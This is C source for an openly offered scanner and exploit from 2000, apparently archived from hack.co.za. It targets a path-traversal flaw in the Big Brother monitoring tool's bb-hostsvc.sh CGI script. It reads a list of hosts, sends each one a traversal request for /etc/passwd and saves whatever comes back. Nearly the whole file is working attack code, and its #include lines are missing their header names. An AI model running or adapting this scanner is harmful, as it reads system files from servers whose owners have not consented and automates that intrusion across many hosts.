/* * 2000-07-11 * * Ripped from phfscan.c * Big Brother Vulnarability scanner. * Scans for /cgi-bin/bb-hostsvc.sh. * If it exists you might be able to read files from * the system. Good luck. * * Author: Safety@IRCnet who also discovered the bug. * Safety@LinuxMail.ORG * * Credits: #roothat, #vastervik, #smile, Loki, crimson, self, * Bjurr, Metoo, and everyone else who think they should * be on this list. * * Special Thanks goes to Loki who are going to host and design * my homepage. * * Usage: * * ./bbscan < hostlist > outputfile * */ #include #include #include #include #include #include #include #include #include #ifdef LINUX #include #endif #include #include #include #include #include #include int FLAG = 1; int Call(int signo) { FLAG = 0; } main (int argc, char *argv[]) { char host[100], buffer[1024], hosta[1024],FileBuf[8097]; int outsocket, serv_len, len,X,c,outfd; struct hostent *nametocheck; struct sockaddr_in serv_addr; struct in_addr outgoing; char bbvuln[]="GET /cgi-bin/bb-hostsvc.sh?HOSTSVC=/../../../../../../../../etc/passwd\n\n"; while(fgets(hosta,100,stdin)) { if(hosta[0] == '\0') break; hosta[strlen(hosta) -1] = '\0'; write(1,hosta,strlen(hosta)*sizeof(char)); write(1,"\n",sizeof(char)); outsocket = socket (AF_INET, SOCK_STREAM, 0); memset (&serv_addr, 0, sizeof (serv_addr)); serv_addr.sin_family = AF_INET; nametocheck = gethostbyname (hosta); /* Ugly stuff to get host name into inet_ntoa form */ (void *) memcpy (&outgoing.s_addr, nametocheck->h_addr_list[0], sizeof (outgoing.s_addr)); strncpy(host, inet_ntoa (outgoing), 100); serv_addr.sin_addr.s_addr = inet_addr (host); serv_addr.sin_port = htons (80); signal(SIGALRM,Call); FLAG = 1; alarm(10); X=connect (outsocket, (struct sockaddr *) &serv_addr, sizeof (serv_addr)); alarm(0); if(FLAG == 1 && X==0){ write(outsocket,bbvuln,strlen(bbvuln)*sizeof(char)); while((X=read(outsocket,FileBuf,8096))!=0) write(1,FileBuf,X); } close (outsocket); } return 0; } /* www.hack.co.za [18 July 2000]*/